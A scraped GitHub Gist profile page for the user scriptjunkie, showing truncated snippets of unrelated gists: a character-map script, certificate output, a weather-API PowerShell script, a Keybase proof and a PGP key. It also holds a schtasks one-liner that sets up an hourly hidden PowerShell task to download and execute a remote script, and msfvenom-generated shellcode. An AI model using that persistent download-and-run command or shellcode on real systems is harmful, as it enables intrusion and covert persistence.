Skip to content

Instantly share code, notes, and snippets.

View scriptjunkie's full-sized avatar

Matt Weeks scriptjunkie

View GitHub Profile
const NEW_CHARMAP = "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20!\"#$%&'{([])}*+-.\\/0123456789:;,<=>?@EeAaUuOoIiFfGgHhJjLl|WwMmNnBbDdTtPpQqRrKkCcSsZzVvXxYy^_`~";
function get_new_char_code(old_char_code){
return NEW_CHARMAP.indexOf(String.fromCharCode(old_char_code));
}
function get_old_char_code(new_char_code){
return NEW_CHARMAP.charCodeAt(new_char_code);
}
https://1.1.1.1/
The certificate is not trusted because it is self-signed.
HTTP Strict Transport Security: false
HTTP Public Key Pinning: false
Certificate chain:
-----BEGIN CERTIFICATE-----
@scriptjunkie
scriptjunkie / schtasks_powershell_downexec.cmd
Created February 8, 2018 03:23
Avoiding inner quotes using echo
schtasks.exe /create /tn myscript /tr "powershell.exe -Window hidden -c 'IEX ((new-object net.webclient).downloadstring((echo https://www.example.com/myscript.ps1)))'" /sc hourly /f
@scriptjunkie
scriptjunkie / queryweatherdata.ps1
Created January 25, 2017 03:15
Querying Temperatures through the WUnderground API with PowerShell
#Get weather data from wunderground
#Just an example
#scriptjunkie 2017
#Public domain
#https://www.wunderground.com/history/airport/KJAC/2017/1/24/DailyHistory.html?req_city=Jackson+Hole&req_state=WY&req_statename=Wyoming&reqdb.zip=83012&reqdb.magic=5&reqdb.wmo=99999&format=1
$startdate = Get-Date
$highs = New-Object System.Collections.ArrayList
$lows = New-Object System.Collections.ArrayList
0..365 | %{
### Keybase proof
I hereby claim:
* I am scriptjunkie on github.
* I am scriptjunkie (https://keybase.io/scriptjunkie) on keybase.
* I have a public key whose fingerprint is F884 DEEB 70B9 3279 698A F765 E0F4 9052 591C 6B5D
To claim this, I am signing this object:
<?xml version="1.0" encoding="Windows-1252"?>
<VisualStudioProject
ProjectType="Visual C++"
Version="9.00"
Name="installlinux"
ProjectGUID="{813D0331-CD65-43A8-A502-30B183418217}"
RootNamespace="installlinux"
Keyword="Win32Proj"
TargetFrameworkVersion="196613"
>
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: SKS 1.1.0
mQINBFGQLWwBEAChj84Zh/S+WxjsEpDHp0ewKOAZQocyxc1rjt4VG9CaxeLJtA8Il5LYO8KV
Ei9AnI+TCh/Eyj+bot0aJQM9pCc6WOUFHvkqmOnjT8YJITRKTM8ggooXUi59I100JGOc2290
ILfZe+kuh6U27jdusu0XNQ64NWY7Eh9jPyiyGA5ow6PSsecg7Mehylx60MI8PfiZqQQ15dux
g2X2ZEbq9CYxe5SwO5etVSSJiiRQmPGQt5bur5u3Mphrmm8mRHvKOuxJGZd7w4BGxthJlyrL
F568kuGkiNDURyjvK4VoS/UIHAO8iqBPYPiL8rrMlBiDyaKsKyWeRSYOmMwqxR7xJd/2ng8L
gU9mHW1jbQFWpBMLrE8tFzSeMn5XJHd4aRADQGmB17GC4Lv6gC3krTZ9wNsHC7ANVRwaMRfR
Lt6ExvrfEozymok66Im2eczbQGTDG3gqxhaB7phHDbcr+bGIfe8OuCSSbnjVEjEoxx8lF2aT
$ msfvenom -p windows/exec -f c CMD=calc
unsigned char buf[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"